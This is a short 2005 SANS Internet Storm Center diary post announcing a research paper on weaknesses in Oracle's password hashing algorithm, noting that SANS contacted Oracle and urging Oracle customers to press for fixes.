Handler Joshua Wright and Dr. Carlos Cid from the Information Security Group at the Royal Holloway, University of London have published a paper describing the inner workings and vulnerabilities in the Oracle password hashing algorithm. A copy of the paper is available through the SANS Reading Room at http://www.sans.org/rr/special/index.php?id=oracle_pass.
The authors findings indicates that the password hashing algorithm is weak, and subject to a number of attacks. If an attacker is able to obtain Oracle password hash information from a compromised system, hrough traffic sniffing, SQL injection or other attack vectors, they will likely be able to recover plaintext passwords with few resources, even when strong passwords are selected. The paper also recommendsseveral actions Oracle DBA's can take to help mitigate this threat.
The SANS Institute contacted the Oracle product security team about these findings on 7/12/2005. Subsequent requests for clarification on what Oracle plans to do to address these vulnerabilities have gone unanswered. Oracle customers are encouraged to communicate their desire to resolve these vulnerabilities through the appropriate channels. I will be teaching next: Defending Web Applications Security Essentials - SANS San Francisco Spring 2020
Oct 27th 2005
1 decade ago